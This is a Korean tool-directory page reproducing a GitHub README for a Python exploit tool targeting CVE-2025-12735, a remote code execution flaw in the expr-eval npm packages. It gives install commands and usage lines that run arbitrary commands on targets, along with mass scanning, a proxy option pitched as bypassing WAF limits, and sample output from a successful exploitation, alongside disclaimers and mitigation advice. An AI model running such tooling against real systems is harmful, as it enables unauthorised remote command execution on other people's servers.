Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-12735-expr-eval-rce — CVE-2025-12735(expr-eval RCE 취약점) 탐지 및 테스트를 위한 보안 연구 도구 | Kitploit
도구/GitHubGitHub/alnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubalnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

CVE-2025-12735(expr-eval RCE 취약점) 탐지 및 테스트를 위한 보안 연구 도구

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
9개월 전아직 검토되지 않음

CVE-2025-12735 expr-eval RCE 익스플로잇

expr-eval 및 expr-eval-fork npm 패키지에서 CVE-2025-12735 취약점을 탐지하고 테스트하기 위한 보안 연구 도구입니다.

⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 이 도구는 소유한 시스템이나 명시적인 서면 승인을 받은 시스템에서만 사용하세요.

📋 개요

CVE-2025-12735는 expr-eval 및 expr-eval-fork npm 패키지의 치명적인 원격 코드 실행(RCE) 취약점입니다. 이 취약점은 공격자가 파서에서 사용하는 context 객체 내에 임의의 함수를 정의할 수 있게 하여, 시스템 수준의 명령을 실행하는 악성 코드를 주입할 수 있도록 합니다.

CVSS 점수: 9.8 (치명적)
영향을 받는 버전: expr-eval-fork < 3.0.0
수정된 버전: expr-eval-fork v3.0.0+

🔍 기능

  • 자동 탐지: JavaScript 파일에서 expr-eval 라이브러리 사용을 스캔합니다.
  • 엔드포인트 발견: 평가 엔드포인트를 자동으로 찾습니다.
  • 취약점 테스트: CVE-2025-12735 취약점을 테스트합니다.
  • 명령 실행: RCE 기능을 시연합니다 (승인된 테스트용).
  • 멀티스레딩 지원: 여러 대상을 병렬로 스캔합니다.
  • 프록시 지원: WAF/Cloudflare 제한을 우회합니다.
  • JSON 내보내기: 상세 결과를 JSON 형식으로 제공합니다.

📦 설치

사전 요구 사항

  • Python 3.6 이상
  • pip (Python 패키지 관리자)

빠른 설치

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

대안: 직접 다운로드

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Install dependencies
pip install requests

🚀 사용법

기본 사용법

root@kitploit:~
# Single target
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Execute custom command
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# With threading for faster scanning
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Verbose output for debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

프록시 사용

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

명령줄 옵션

root@kitploit:~
-u, --url          Target URL
-f, --file         File containing target URLs (one per line)
-c, --command      Command to execute (default: id)
-t, --threads      Number of threads (default: 1)
-o, --output       Output file (default: uknf_expr_eval_results.json)
-v, --verbose      Enable verbose logging
--proxy            Proxy URL (e.g., http://127.0.0.1:8080)
--proxy-list       File containing proxy URLs (one per line)

📊 출력

스크립트는 상세 결과가 포함된 JSON 파일을 생성합니다:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 작동 원리

  1. 탐지 단계: JavaScript 파일 및 HTML 콘텐츠에서 expr-eval 참조를 스캔합니다.
  2. 엔드포인트 발견: expr-eval을 사용할 수 있는 일반적인 API 엔드포인트를 테스트합니다.
  3. 취약점 테스트: context 객체에 임의의 함수를 주입하려 시도합니다.
  4. 악용: 취약한 경우 RCE 기능을 시연합니다.

🛡️ 완화 방법

expr-eval 또는 expr-eval-fork를 사용 중이라면:

  1. 즉시 업그레이드하세요:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. 보안 패치를 적용하세요:

    • expr-eval에 Pull Request #288을 적용하세요
    • 또는 expr-eval-fork v3.0.0+로 전환하세요
  3. 입력 검증을 구현하세요:

    • 모든 사용자 입력을 정화하세요
    • 함수 화이트리스트를 사용하세요
    • context 객체를 검증하세요

📚 참고 자료

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub 보안 권고: GHSA-jc85-fpwf-qm7x
  • 보안 패치: PR #288

📖 예제

예제 1: 단일 대상 스캔

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

예제 2: 출력을 포함한 다중 대상 스캔

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

예제 3: 사용자 정의 명령 실행

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

예제 4: 프록시 사용

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 기여

기여는 환영합니다! Pull Request를 자유롭게 제출해 주세요.

  1. 저장소를 Fork하세요
  2. 기능 브랜치를 생성하세요 (git checkout -b feature/AmazingFeature)
  3. 변경 사항을 커밋하세요 (git commit -m 'Add some AmazingFeature')
  4. 브랜치에 푸시하세요 (git push origin feature/AmazingFeature)
  5. Pull Request를 여세요

🐛 이슈

문제가 발생하거나 제안 사항이 있으면 GitHub에 이슈를 등록해 주세요.

📝 라이선스

이 프로젝트는 MIT 라이선스로 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

⭐ Star 기록

이 도구가 유용하다면 GitHub에서 Star를 남겨 주시기 바랍니다!

⚖️ 법적 고지

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 저자는 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 시스템을 테스트하기 전에 적절한 권한을 보유하고 있는지 확인할 책임이 있습니다.

🙏 감사의 말

  • 원본 취약점 발견자: Jangwoo Choe (UKO)
  • 취약점 공개를 위한 CERT 조정 센터
  • 보안 권고를 제공한 GitHub Security 및 npm

💰 후원

이 도구가 유용하다고 생각되고 프로젝트를 지원하고 싶다면:

비트코인(BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

이더리움(ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

지원해 주셔서 감사합니다! 🙏

도구 다운로드